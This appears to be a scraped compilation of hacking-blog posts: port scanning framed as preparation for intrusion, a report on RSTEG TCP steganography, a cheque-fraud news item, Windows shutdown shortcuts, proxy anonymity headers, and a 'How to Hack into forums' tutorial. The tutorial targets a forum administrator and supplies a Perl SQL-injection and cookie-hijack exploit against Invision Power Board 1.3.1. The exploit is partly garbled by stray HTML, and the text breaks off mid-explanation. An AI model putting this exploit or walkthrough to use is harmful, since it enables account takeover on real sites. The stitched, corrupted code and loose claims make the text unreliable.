Port scanning determines which ports are listening to the active connections on the subjected host. These ports represent potential communication channels. With the help of port scanning we get close to the network communication scenario. We get to know more about victim’s network which is useful for further attacks. Internet does not exclusively rely on TCP port 80, used by hypertext transfer protocol (HTTP). Any surfer surfing any website can gain the same level of proficiency as your average casual surfer. Port scanning can be efficiently done to reveal the secret’s about the host.
Automated port scanners are necessary to perform such scanning, which are available in the market for very small cost.
Port scanning is done so as to gather information passively about the victim. This help’s intruder to eavesdrop into Victim’s Network.
Such scanning also helps in gathering information so as to form a network map. Network map are useful to get to know the victim network architecture or hierarchy.
There are thousands of ports available for communication on a network some well known are FTP, HTTP, SMTP etc., Which ports remains open or close depends on the network’s requirement. Like any web server will always have an FTP port open.
Every port has its unique number which is targeted after the successful port scanning. Various bugs, backdoors are installed on these ports and tested whether the system is vulnerable.
And this is how a successful attack through port scanning is done.
Hope you have enjoyed this informative article about port scanning. We are covering requirements of a good port scanner
Intrusion Attack Through Port Scanning
Reqiurement For Good Port Scanners
Dynamic delay time calculations: Delay time is necessary for some scanners to send the data chunks. So you need to check whether it is working properly or not with ping, which gives replies to every execution. But that is some time cumbersome, so you can use connect ( ) to a closed port on target. Which can gives you an initial delay time you’re your scanner. Simple, isn’t it!!!
Parallel Port Scanning: Scanners generally scans orts linearly and one by one till total ports are reached, but this old technique only works better with TCP on a faster network. So you need to test whether your port scanner has parallel port scanning or not because we have to scan over larger area or wide area network.
Port Scanners
Port Scanners
Flexible Port Specification: Can you believe we need to scan all 65535 ports. It will be slow and tiresome process. Also, the scanners which only allow you to scan ports 1 - N often fall short of an intruder’s need. Test whether your scanner has ranges option available which can allow you to scan the ports in better manner.
Flexible target specification: On a larger network you may surely want to scan more than one or two hosts. So you should have flexible target specification available on your port scanner.
Retransmission: Sending chunks and collecting for response is a way old technique for scanners. But this can lead to false positives or negatives in the case where packets are dropped. So, check whether your scanner have automated retransmission available.
So these are some of the primary facts of considerations. Some secondary consideration includes Down Host Detection, Own IP detector, and IP scanner etc.
Hiding secret messages in internet traffic
Researchers have demonstrated a new way to hide secret messages in internet traffic that can elude even vigilant network operators.
The process is a network application of steganography, which is the ancient science and art of hiding messages in documents, pictures and other media in a way that can be easily detected by the intended recipient, but not by third parties. The researchers from the Warsaw University of Technology have found a way to apply the principle to network traffic by exploiting design weaknesses in TCP, or transmission control protocol.
RSTEG, short for Retransmission Steganography, works by manipulating the back-and-forth sequence and messages exchanged each time an internet packet is sent. Typically, a computer on the receiving end sends a confirmation each time one is successfully transmitted. RSTEG works by deliberately withholding the acknowledgment, which then prompts the packet to be resent.
"In the context of RSTEG, a sender replaces original payload with a steganogram instead of sending the same packet again," the paper, authored by Wojciech Mazurczyk, Miłosz Smolarczyk, and Krzysztof Szczypiorski, states. "When the retransmitted packet reaches the receiver, he/she can then extract hidden information."
The technique has important implications for network security because it can be used by attackers to conceal the leakage of confidential information, the paper warns. It goes on to detail four scenarios in which the attack can be used, including one that requires no control of intermediate nodes. The other three are harder to pull off, but they are also harder to detect by third parties.
"No real-world steganographic method is perfect; whatever the method, the hidden information can be potentially discovered," the researchers write. "In general, the more hidden information is inserted into the data stream, the greater the chance that it will be detected, for example, by scanning the data flow or by some other seganalysis methods."
To evade detection, those using the technique must limit the number of retransmissions to non-suspicious levels.
Steganography dates back to the Fifth Century BC at least, when Greek messengers buried messages on wax tablets before sealing them with beeswax. In more recent times, it's been used to sneak data into all kinds of electronic media, including digital photographs and executable files. The same Polish researchers who described RSTEG also developed a similar technique targeting voice over IP traffic.
While RSTEG works only with TCP, the principle can be applied to other protocols as well, including those for wireless networks. A PDF of the paper is available here
Massive ID fraud and cheque scam busted in NYC
A corporate identity theft ring that exploited the identities of local corporations, religious institutions, hospitals and even schools to run a cheque fraud scam has been busted in New York.
Investigators reckon the gang of 18 suspects made millions by impersonating workers from an estimated 350 New York-based organisations. Data purchased from corrupt bank insiders was used to lay the groundwork for the scam, which relied on cashing thousands of counterfeit payroll cheques. The fraudsters also plundered the bank accounts of individual victims, using data obtained from corrupt bank insiders to transfer funds to banks under the control of the gang.
Police are investigating the possible involvement of other suspected bank workers in the scam as part of the ongoing investigation. ®
source : register
Create One-Click Shutdown and Reboot Shortcuts
But you can do much more with a shutdown shortcut than merely shut down your PC. You can add any combination of several switches to do extra duty, like this:
shutdown -r -t 01 -c “Rebooting your PC”
Double-clicking on that shortcut will reboot your PC after a one-second delay and display the message “Rebooting your PC.” The shutdown command includes a variety of switches you can use to customize it.
I use this technique to create two shutdown shortcuts on my desktop—one for turning off my PC, and one for rebooting. Here are the ones I use:
shutdown -s -t 03 -c “Bye Bye m8!”
shutdown -r -t 03 -c “I ll be back m8 ;)!”
Switch
What it does
-s
Shuts down the PC.
-l
Logs off the current user.
-t nn
Indicates the duration of delay, in seconds, before performing the action.
-c “messagetext”
Displays a message in the System Shutdown window. A maximum of 127 characters can be used. The message must be enclosed in quotation marks.
-f
Forces any running applications to shut down.
-r
Reboots the PC
Anonymity of a Proxy Server Explained
- name and a version of an operating system
- name and a version of a browser
- configuration of a browser (display resolution, color depth, java / javascript support, …)
- IP-address of a client
- Other information
- country where you are from
- city
- your provider?s name and e-mail
- your physical address
[eminimall]
These are examples of variable values:
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
Transparent Proxies
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP
Anonymous Proxies
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined
Summary
How to Hack into forums
This is what you like to call “Hacking a forum”.
I call it “Cracking into a forum” … Learn what hacking means you, lol…
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.
So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:
CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works 
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent(”Mosiac 1.0″ . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}
my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;
exit;
}
my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);
my $outputs = ”;
for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}
}
if ( length($outputs) < member_id=” . $user . ” pass_hash=”">
What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.
